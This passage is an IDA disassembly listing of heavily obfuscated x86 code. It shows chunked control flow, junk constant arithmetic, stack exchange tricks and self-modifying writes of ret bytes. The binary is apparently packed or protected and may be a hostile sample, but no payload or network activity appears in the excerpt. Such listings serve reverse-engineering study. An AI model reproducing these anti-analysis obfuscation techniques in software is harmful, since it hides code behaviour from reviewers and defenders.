		jmp	loc_43E734
; END OF FUNCTION CHUNK	FOR sub_44FA95
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44753E

loc_43EDC6:				; CODE XREF: sub_44753E+1084Cj
		xchg	eax, [ecx]
		jmp	loc_443E26
; END OF FUNCTION CHUNK	FOR sub_44753E
; ---------------------------------------------------------------------------

loc_43EDCD:				; CODE XREF: y2kk37jd:loc_44BCBFj
		or	edi, 6374BEA3h
		call	sub_457468
; START	OF FUNCTION CHUNK FOR sub_44346B

loc_43EDD8:				; CODE XREF: sub_44346B+1291j
		jmp	loc_43CA22
; END OF FUNCTION CHUNK	FOR sub_44346B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D302

loc_43EDDD:				; CODE XREF: sub_44D302-9E5Fj
		jmp	sub_45430C
; END OF FUNCTION CHUNK	FOR sub_44D302
; ---------------------------------------------------------------------------

locret_43EDE2:				; CODE XREF: y2kk37jd:00450E33j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444E83

loc_43EDE3:				; CODE XREF: sub_444E83+F88Dj
		sub	esi, eax
; END OF FUNCTION CHUNK	FOR sub_444E83

; =============== S U B	R O U T	I N E =======================================



sub_43EDE5	proc near		; CODE XREF: sub_44289F-513p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043E6DC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452B00 SIZE 00000027 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		xchg	ebx, [esp-4+arg_0]
		mov	eax, ebx
		pop	ebx
		sub	eax, 70690029h
		jmp	loc_43E6DC
sub_43EDE5	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4484F7

loc_43EDFA:				; CODE XREF: sub_4484F7+16j
		push	28h
		mov	eax, [ebp-4]
		push	eax
		call	sub_45C2E1
		push	offset sub_4479FB
		jmp	nullsub_511
; END OF FUNCTION CHUNK	FOR sub_4484F7
; ---------------------------------------------------------------------------
		xor	edx, 0AE68D2F3h
		jmp	sub_44C5B8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DA43

loc_43EE1A:				; CODE XREF: sub_43DA43:loc_45785Aj
					; sub_43DA43+19E26j
		rol	edi, 1Dh
		jb	loc_44A079
		pushf
		and	eax, 7FF313F0h
		jmp	loc_44A079
; END OF FUNCTION CHUNK	FOR sub_43DA43
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4577FE

loc_43EE2F:				; CODE XREF: sub_4577FE:loc_43E628j
		not	eax
		jnb	loc_44AEDF
		jbe	loc_43FEA9
		jmp	loc_44F561
; END OF FUNCTION CHUNK	FOR sub_4577FE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DBF8

loc_43EE42:				; CODE XREF: sub_44DBF8:loc_44286Bj
					; y2kk37jd:0044287Fj
		add	eax, 8EECB26Ch
		add	eax, ebp

loc_43EE4A:				; CODE XREF: y2kk37jd:004587CFj
		add	eax, 81D46F57h
		push	edi
		mov	edi, eax
		jmp	loc_45702C
; END OF FUNCTION CHUNK	FOR sub_44DBF8
; ---------------------------------------------------------------------------
		popf
		jmp	sub_4590D6
; ---------------------------------------------------------------------------
		cdq
		ror	eax, 1Ch
		jmp	sub_440B7C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EF62

loc_43EE67:				; CODE XREF: sub_43EF62+7j
		lea	eax, loc_4506D5
		mov	byte ptr [eax],	0C3h
		jmp	loc_4506D5
; END OF FUNCTION CHUNK	FOR sub_43EF62
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_41976B

loc_43EE75:				; CODE XREF: sub_41976B+Dj
					; sub_41976B+2570Fj
					; DATA XREF: ...
		call	sub_43EE8A
		jmp	ds:off_41E1FC
; END OF FUNCTION CHUNK	FOR sub_41976B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445787

loc_43EE80:				; CODE XREF: sub_445787+170j
		jmp	loc_443876
; END OF FUNCTION CHUNK	FOR sub_445787
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C06A

loc_43EE85:				; CODE XREF: sub_43C06A:loc_43C07Fj
		jmp	loc_453601
; END OF FUNCTION CHUNK	FOR sub_43C06A

; =============== S U B	R O U T	I N E =======================================



sub_43EE8A	proc near		; CODE XREF: sub_41976B:loc_43EE75p
					; sub_443FB8+9j ...

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043C0CF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443FC6 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004523CC SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00454516 SIZE 00000023 BYTES

		jo	loc_443FC6
		xchg	ebp, [esp+0]
		mov	edx, ebp
		pop	ebp
		jmp	loc_4523CC
sub_43EE8A	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_43EE9B:				; CODE XREF: y2kk37jd:loc_446557j
		jb	loc_448CEC
		sub	edx, eax
		mov	ecx, [ebp-4]
		call	sub_43BAF2
; START	OF FUNCTION CHUNK FOR sub_44365E

loc_43EEAB:				; CODE XREF: sub_44365E+11j
		jmp	nullsub_514
; END OF FUNCTION CHUNK	FOR sub_44365E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C851

loc_43EEB0:				; CODE XREF: sub_43C851+FF1j
					; sub_43C851:loc_4446D4j
		push	94FEDB34h
		xchg	ecx, [esp-8+arg_4]
		mov	eax, ecx
		pop	ecx
		or	eax, 34F5A8DBh
		test	eax, 8
		jmp	loc_4595C2
; END OF FUNCTION CHUNK	FOR sub_43C851
; ---------------------------------------------------------------------------

loc_43EECC:				; CODE XREF: y2kk37jd:0044C6B8j
		jo	loc_45627E
		jno	loc_447F86
		mov	edx, 7CB1432Ch
; START	OF FUNCTION CHUNK FOR sub_44606C

loc_43EEDD:				; CODE XREF: sub_44606C:loc_43FBD5j
		sub	eax, 0B2EEADAFh
		xor	eax, 0E581A1C3h
		and	eax, ds:4000ECh
		add	eax, 0EDCE8EA0h
		jmp	loc_458F0B
; END OF FUNCTION CHUNK	FOR sub_44606C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445083

loc_43EEFA:				; CODE XREF: sub_445083+9j
		push	92F0A7FDh
		pop	eax
		xor	eax, 8CE09818h
		add	eax, 0DC3D5727h
		xor	eax, 4454EE46h
		or	eax, 0F6D2884Dh
		add	eax, 1688868h
		jmp	loc_443CD4
; END OF FUNCTION CHUNK	FOR sub_445083
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440AA5

loc_43EF23:				; CODE XREF: sub_440AA5+BBE5j
		add	edx, 0EC7B2DB9h
		xor	edx, ds:4000E8h
		add	edx, 0CA76D570h
		xchg	edx, [esp+0]
		jmp	sub_440337
; END OF FUNCTION CHUNK	FOR sub_440AA5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B163

loc_43EF3D:				; CODE XREF: sub_43B163:loc_4497F3j
					; y2kk37jd:0044980Ej
		call	sub_4571F1
; END OF FUNCTION CHUNK	FOR sub_43B163
; START	OF FUNCTION CHUNK FOR sub_444693

loc_43EF42:				; CODE XREF: sub_444693+13j
		jmp	loc_44BD85
; END OF FUNCTION CHUNK	FOR sub_444693
; ---------------------------------------------------------------------------
		shl	ebp, 1Dh
		jmp	loc_442DD5

; =============== S U B	R O U T	I N E =======================================



sub_43EF4F	proc near		; CODE XREF: y2kk37jd:0043FF55j
					; sub_453867+362Bp

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043C7E6 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0043C8B1 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0043D9D5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043DBBF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043E5EA SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0043EB17 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043ECF3 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00441F2B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443261 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00444A52 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00446F17 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004487F8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044960A SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044974C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044AA24 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044B5C4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044BA99 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0044BBAA SIZE 00000021 BYTES
; FUNCTION CHUNK AT 0044C5E3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044CBAF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451EC9 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00452A54 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00455A79 SIZE 00000026 BYTES
; FUNCTION CHUNK AT 00458755 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0045BABB SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0045BC54 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045C564 SIZE 0000000A BYTES

		xchg	esi, [esp+0]
		pop	esi
		or	eax, eax
		jnz	loc_44960A
		jmp	loc_44AA24
sub_43EF4F	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_43EF60:				; CODE XREF: y2kk37jd:00458DD4j
		shl	eax, 1

; =============== S U B	R O U T	I N E =======================================



sub_43EF62	proc near		; CODE XREF: y2kk37jd:loc_4538A7p

; FUNCTION CHUNK AT 0043EE67 SIZE 0000000E BYTES

		xchg	esi, [esp+0]
		pop	esi
		mov	[esi], eax
		pop	esi
		jmp	loc_43EE67
sub_43EF62	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451E9F

loc_43EF6E:				; CODE XREF: sub_451E9F:loc_44E2B0j
		call	sub_4574B7
		pop	ecx
		mov	[ebp-20h], eax

loc_43EF77:				; CODE XREF: sub_451E9F-DCACj
					; sub_451E9F-95BCj ...
		mov	eax, [ebp-20h]
		sub	eax, [ebp-28h]
		mov	[ebp-24h], eax
		mov	eax, [ebp-24h]
		jmp	loc_43C66A
; END OF FUNCTION CHUNK	FOR sub_451E9F
; ---------------------------------------------------------------------------

loc_43EF88:				; CODE XREF: y2kk37jd:loc_44A4F4j
		pop	edx
		rol	edx, 12h
		add	edx, 206D6257h
		xchg	edx, [esp]
		jmp	sub_445DF5
; ---------------------------------------------------------------------------

loc_43EF9A:				; DATA XREF: sub_4458DD+8946o
		add	eax, 2D38117Ah
		call	sub_44113A
		push	edx
		push	0C993873Fh
		pop	edx
		xor	edx, 818974C5h
		add	edx, 5AACF51Ah
		jmp	loc_4505D1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4424CA

loc_43EFBD:				; CODE XREF: sub_4424CA+C3Bj
					; sub_4424CA:loc_454279j
		mov	eax, 80F02D07h
		call	sub_442C3E
; END OF FUNCTION CHUNK	FOR sub_4424CA
; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_43EFC7:				; CODE XREF: sub_4448E2+D8EEj
		add	eax, 0EDBEE97Ah
		rol	eax, 10h
		push	edi
		jmp	loc_456766
; END OF FUNCTION CHUNK	FOR sub_4448E2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443525

loc_43EFD6:				; CODE XREF: sub_443525:loc_44CDBEj
					; y2kk37jd:00452432j
		sub	esi, ds:4000F3h
		or	esi, 85ADCD4Fh
		add	esi, 28554151h
		popf
		jmp	loc_45A826
; END OF FUNCTION CHUNK	FOR sub_443525
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_411. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4415B8

loc_43EFEF:				; CODE XREF: sub_4415B8+3j
		mov	ecx, ebp
		xchg	ecx, [esp+4+var_4]
		call	sub_4578A6

loc_43EFF9:				; CODE XREF: sub_454413-EA7Fj
		jmp	loc_45764D
; END OF FUNCTION CHUNK	FOR sub_4415B8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D41D

loc_43EFFE:				; CODE XREF: sub_43D41D:loc_43FEEAj
					; sub_43D41D:loc_45206Ej
		push	13397BA5h
		pop	eax
		add	eax, 1135C81h
		cmp	eax, 0BF0BE099h
		jmp	loc_45009C
; END OF FUNCTION CHUNK	FOR sub_43D41D
; ---------------------------------------------------------------------------
		shl	ebp, 6
		jmp	sub_43BDF4
; ---------------------------------------------------------------------------

loc_43F01D:				; CODE XREF: y2kk37jd:0044A23Ej
		jnp	loc_459D12

; =============== S U B	R O U T	I N E =======================================



sub_43F023	proc near		; CODE XREF: sub_449129+F87p

arg_0		= dword	ptr  4

		xchg	ecx, [esp+0]
		pop	ecx
		add	ebx, 3E98DE86h
		xchg	ebx, [esp-4+arg_0]
		jmp	sub_447977
sub_43F023	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F2F2

loc_43F035:				; CODE XREF: sub_43F2F2:loc_44A3A1j
		xchg	esi, [esp+4+var_4]
		jmp	loc_444636
; END OF FUNCTION CHUNK	FOR sub_43F2F2
; ---------------------------------------------------------------------------

loc_43F03D:				; DATA XREF: sub_444A2B-5625o
		mov	[ebp-8], eax
		mov	eax, [ebp-8]
		mov	esp, ebp
		pop	ebp
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452C0C

loc_43F047:				; CODE XREF: sub_452C0C+1Ej
		cmp	dword ptr [ebp-10h], 1
		push	offset sub_452B75
		jmp	loc_443C42
; END OF FUNCTION CHUNK	FOR sub_452C0C
; ---------------------------------------------------------------------------
		cmp	ecx, 417530A9h
		jmp	loc_450F05
; ---------------------------------------------------------------------------

loc_43F060:				; CODE XREF: y2kk37jd:00453D6Dj
		add	edx, 3A6F2B1Ah
		push	0D75FE30Ch
; START	OF FUNCTION CHUNK FOR sub_458713

loc_43F06B:				; CODE XREF: sub_458713-49BEj
		xor	edi, 0A3BEE56Eh
		or	edi, 0AC55A8AAh
		xor	edi, 7725227Bh
		add	edi, 27CA1E33h
		jmp	loc_44AF01
; END OF FUNCTION CHUNK	FOR sub_458713
; ---------------------------------------------------------------------------
		and	esi, 59A1177Dh
		pop	esi
		jmp	sub_456BCD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C865

loc_43F094:				; CODE XREF: sub_43C865+1BA2Aj
		jnz	loc_448192
		jmp	loc_45355E
; END OF FUNCTION CHUNK	FOR sub_43C865
; ---------------------------------------------------------------------------

loc_43F09F:				; CODE XREF: y2kk37jd:004545CCj
		jbe	loc_454729

; =============== S U B	R O U T	I N E =======================================



sub_43F0A5	proc near		; CODE XREF: sub_43FE06-661j
					; sub_45B4CB+Ep

; FUNCTION CHUNK AT 00442CE5 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0044393F SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044AA7B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F925 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044FA27 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00452987 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004559EB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00459A33 SIZE 00000024 BYTES
; FUNCTION CHUNK AT 0045AB7A SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0045BADA SIZE 0000000B BYTES

		xchg	edx, [esp+0]
		pop	edx
		mov	eax, [eax]
		or	al, al
		jmp	loc_44AA7B
sub_43F0A5	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		mov	ebp, 84DF8811h
		jmp	sub_45AAAA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442376

loc_43F0BC:				; CODE XREF: sub_442376+Cj
		jnz	loc_454EC1
		jmp	loc_44F717
; END OF FUNCTION CHUNK	FOR sub_442376
; ---------------------------------------------------------------------------

loc_43F0C7:				; DATA XREF: sub_449734+7784o
		xchg	ebx, [esp]
		jmp	loc_45B819
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449C4F

loc_43F0CF:				; CODE XREF: sub_449C4F:loc_43B5C1j
		push	offset sub_457524
		jmp	nullsub_424
; END OF FUNCTION CHUNK	FOR sub_449C4F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F346

loc_43F0D9:				; CODE XREF: sub_43F346:loc_44734Ej
		jz	loc_449555
; END OF FUNCTION CHUNK	FOR sub_43F346
; START	OF FUNCTION CHUNK FOR sub_453BA8

loc_43F0DF:				; CODE XREF: sub_453BA8+Fj
		jmp	loc_458911
; END OF FUNCTION CHUNK	FOR sub_453BA8
; ---------------------------------------------------------------------------

loc_43F0E4:				; CODE XREF: y2kk37jd:00444B35j
		jmp	loc_4471F6
; ---------------------------------------------------------------------------
		and	edi, eax
		sbb	eax, 0ACB09724h
		mov	[edi], esi
		jmp	loc_449553
; ---------------------------------------------------------------------------

loc_43F0F8:				; CODE XREF: y2kk37jd:loc_450573j
		mov	byte ptr [eax],	0C3h
		jmp	sub_4430DD

; =============== S U B	R O U T	I N E =======================================



sub_43F100	proc near		; CODE XREF: sub_41A3CC+82p
					; y2kk37jd:0043FE61j
					; DATA XREF: ...
		push	offset loc_453B11
		jmp	nullsub_28
sub_43F100	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457A46

loc_43F10A:				; CODE XREF: sub_457A46:loc_43F201j
		pushf
		jmp	loc_4548BE
; END OF FUNCTION CHUNK	FOR sub_457A46
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446120

loc_43F110:				; CODE XREF: sub_446120+6j
		xchg	edx, [esp+0]
		mov	ebp, edx
		call	sub_457533

loc_43F11A:				; CODE XREF: sub_455958-17496j
		jmp	loc_43C76E
; END OF FUNCTION CHUNK	FOR sub_446120
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B4EE

loc_43F11F:				; CODE XREF: sub_43B4EE+6j
		jmp	loc_43EC5A
; END OF FUNCTION CHUNK	FOR sub_43B4EE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442F9C

loc_43F124:				; CODE XREF: sub_442F9C:loc_444AD4j
		push	0C9AE9614h
		pop	edx
		sub	edx, 0B8D3F314h
		add	edx, 0EF6A3F88h
		xchg	edx, [esp+0]
		jmp	sub_455BE9
; END OF FUNCTION CHUNK	FOR sub_442F9C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4589B7

loc_43F13E:				; CODE XREF: sub_4589B7-5A8Ej
		lea	eax, nullsub_10
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_10
; END OF FUNCTION CHUNK	FOR sub_4589B7
; ---------------------------------------------------------------------------

loc_43F14C:				; CODE XREF: y2kk37jd:loc_45B8DFj
		xchg	eax, [esp]
		mov	edx, eax
		pop	eax
		mov	eax, [esp]
		push	edx
		push	ecx
		jmp	loc_45404E
; ---------------------------------------------------------------------------

loc_43F15C:				; CODE XREF: y2kk37jd:loc_450751j
					; y2kk37jd:00450769j
		or	esi, 4B367BF7h
		add	esi, 908E30A1h
		xchg	esi, [esp]
		jmp	sub_45405E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442EB4

loc_43F170:				; CODE XREF: sub_442EB4+FA59j
		jg	loc_440082
		jmp	loc_452E0B
; END OF FUNCTION CHUNK	FOR sub_442EB4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A6E9

loc_43F17B:				; CODE XREF: sub_44A6E9+13j
		sub	al, 99h
		push	0DDC4185Ah
		pop	edx
		or	edx, 6EAAC51Eh
		jmp	loc_4488BD
; END OF FUNCTION CHUNK	FOR sub_44A6E9
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_323. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B4AA

loc_43F18F:				; CODE XREF: sub_44B4AA:loc_44B4B4j
		jmp	nullsub_367
; END OF FUNCTION CHUNK	FOR sub_44B4AA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B86B

loc_43F194:				; CODE XREF: sub_44B86B:loc_44E5A9j
		pop	esi
		sub	esi, 0B2BE0AC0h
		rol	esi, 0Fh
		and	esi, 0EBEB4E4Eh
		rol	esi, 1
		add	esi, 0AAC2A371h
		jmp	loc_44BF5A
; END OF FUNCTION CHUNK	FOR sub_44B86B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_43F1B1:				; CODE XREF: sub_445226:loc_43BD08j
		xchg	edx, [edi]
		sub	ebx, 0E1256681h
		jmp	loc_43CF5B
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E5E5

loc_43F1BE:				; CODE XREF: sub_44E5E5:loc_43E4DAj
					; sub_44E5E5-B7C9j
		call	nullsub_19
		retn
; END OF FUNCTION CHUNK	FOR sub_44E5E5

; =============== S U B	R O U T	I N E =======================================



sub_43F1C4	proc near		; CODE XREF: sub_44E5E5j

var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043D467 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00448271 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044AE42 SIZE 00000008 BYTES

		push	ebx
		mov	ebx, ecx
		xchg	ebx, [esp+4+var_4]
		push	742D8846h
		xchg	ebx, [esp+8+var_8]
		jmp	loc_43D467
sub_43F1C4	endp

; ---------------------------------------------------------------------------

loc_43F1D7:				; CODE XREF: y2kk37jd:004402B7j
		xor	eax, ds:4000E8h
		add	eax, 2B57FE90h
		add	eax, ebp

loc_43F1E5:				; CODE XREF: y2kk37jd:loc_45BD83j
		add	eax, 0E7B2129Ch
		mov	eax, [eax]
		call	sub_450A16

loc_43F1F2:				; CODE XREF: y2kk37jd:0045507Fj
		jmp	loc_455B1E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_43F1F7:				; CODE XREF: sub_4448E2+CF92j
		jmp	loc_447027
; END OF FUNCTION CHUNK	FOR sub_4448E2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446B6E

loc_43F1FC:				; CODE XREF: sub_446B6E+9740j
		jmp	sub_446B6E
; END OF FUNCTION CHUNK	FOR sub_446B6E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457A46

loc_43F201:				; CODE XREF: sub_457A46-163D9j
		jmp	loc_43F10A
; END OF FUNCTION CHUNK	FOR sub_457A46
; ---------------------------------------------------------------------------

loc_43F206:				; CODE XREF: y2kk37jd:00445C35j
		sbb	edi, 9ADB7AE8h
		rol	edi, 1Eh
; START	OF FUNCTION CHUNK FOR sub_4439EE

loc_43F20F:				; CODE XREF: sub_4439EE:loc_445C20j
		add	ebx, 0E6A829BBh
		rol	ebx, 13h
		add	ebx, 0F1C5CD2Ah
		xchg	ebx, [esp+0]
		jmp	sub_4599BE
; END OF FUNCTION CHUNK	FOR sub_4439EE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CDD5

loc_43F226:				; CODE XREF: sub_44CDD5:loc_442B9Dj
		jz	loc_44CD32
		jmp	loc_453A87
; END OF FUNCTION CHUNK	FOR sub_44CDD5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B0F5

loc_43F231:				; CODE XREF: sub_43B0F5:loc_447D50j
		call	sub_452C4F
		jmp	loc_45943A
; END OF FUNCTION CHUNK	FOR sub_43B0F5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CDD5

loc_43F23B:				; CODE XREF: sub_44CDD5-F13Aj
		jmp	loc_458039
; END OF FUNCTION CHUNK	FOR sub_44CDD5
; ---------------------------------------------------------------------------

loc_43F240:				; CODE XREF: y2kk37jd:0045731Cj
		jbe	loc_442F7F
		sbb	ebx, esi
		jmp	loc_44A685
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442A84

loc_43F24D:				; CODE XREF: sub_442A84:loc_455F12j
		mov	eax, [eax]
		mov	ecx, [eax+4]
		push	9CD37B32h
		pop	eax
		xor	eax, ds:4000EDh
		and	eax, 883BCD78h
		add	eax, 36667365h
		add	eax, ebp
		jmp	loc_4454CD
; END OF FUNCTION CHUNK	FOR sub_442A84
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448DCA

loc_43F271:				; CODE XREF: sub_448DCA:loc_43E4D5j
		xchg	edx, [esp-4+arg_0]
		mov	eax, edx
		pop	edx
		rol	eax, 0Bh
		add	eax, 0E78A01A5h
		jmp	loc_4510D6
; END OF FUNCTION CHUNK	FOR sub_448DCA

; =============== S U B	R O U T	I N E =======================================



sub_43F285	proc near		; DATA XREF: sub_43B8D6+1FE91o

; FUNCTION CHUNK AT 0043C34B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004482D5 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004517F2 SIZE 00000012 BYTES

		xchg	ebp, [esp+0]
		call	sub_443B86
		jmp	loc_4517F2
sub_43F285	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448700

loc_43F292:				; CODE XREF: sub_448700:loc_445B98j
		shr	ecx, 12h
		jmp	loc_442D2F
; END OF FUNCTION CHUNK	FOR sub_448700
; ---------------------------------------------------------------------------
		cmp	ebp, 36B8FDD9h
		jmp	loc_440363
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453867

loc_43F2A5:				; CODE XREF: sub_453867:loc_44D2DCj
		add	eax, 455676A4h
		mov	eax, [eax]
		mov	esp, ebp
		xchg	edi, [esp+4+var_4]
		jmp	loc_45A5D5
; END OF FUNCTION CHUNK	FOR sub_453867
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E03C

loc_43F2B7:				; CODE XREF: sub_43E03C+11065j
		popf
		push	eax
		add	eax, 0F207251Ah
		sbb	edi, eax
		popf
		jmp	loc_4598CC
; END OF FUNCTION CHUNK	FOR sub_43E03C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_489. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CA5B

loc_43F2C8:				; CODE XREF: sub_43CA5B+182E4j
		mov	esp, ebp
		xchg	ecx, [esp+4+var_4]
		mov	ebp, ecx

loc_43F2CF:				; CODE XREF: y2kk37jd:loc_450F05j
		pop	ecx
		push	0EE98E430h
		xchg	ebp, [esp+4+var_4]
		mov	eax, ebp
		jmp	loc_45540E
; END OF FUNCTION CHUNK	FOR sub_43CA5B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453867

loc_43F2DF:				; CODE XREF: sub_453867:loc_441B5Aj
		push	esi
		push	5E48B0D1h
		add	esi, ecx
; END OF FUNCTION CHUNK	FOR sub_453867
; START	OF FUNCTION CHUNK FOR sub_456809

loc_43F2E7:				; CODE XREF: sub_456809-B9D8j
		jmp	loc_44B16E
; END OF FUNCTION CHUNK	FOR sub_456809
; ---------------------------------------------------------------------------

loc_43F2EC:				; CODE XREF: y2kk37jd:0044FBDAj
		jnz	loc_455488

; =============== S U B	R O U T	I N E =======================================



sub_43F2F2	proc near		; CODE XREF: sub_443278:loc_455E70p

var_4		= dword	ptr -4
arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 0043B3C3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043CAA1 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0043CB20 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0043F035 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0043F6FD SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004402DA SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00441995 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00442790 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00443976 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443C4D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044424D SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00444636 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004447D7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447D99 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A144 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044A3A1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044AEE5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B6AE SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044C18F SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044D331 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044EF5C SIZE 00000028 BYTES
; FUNCTION CHUNK AT 00450C21 SIZE 0000000C BYTES
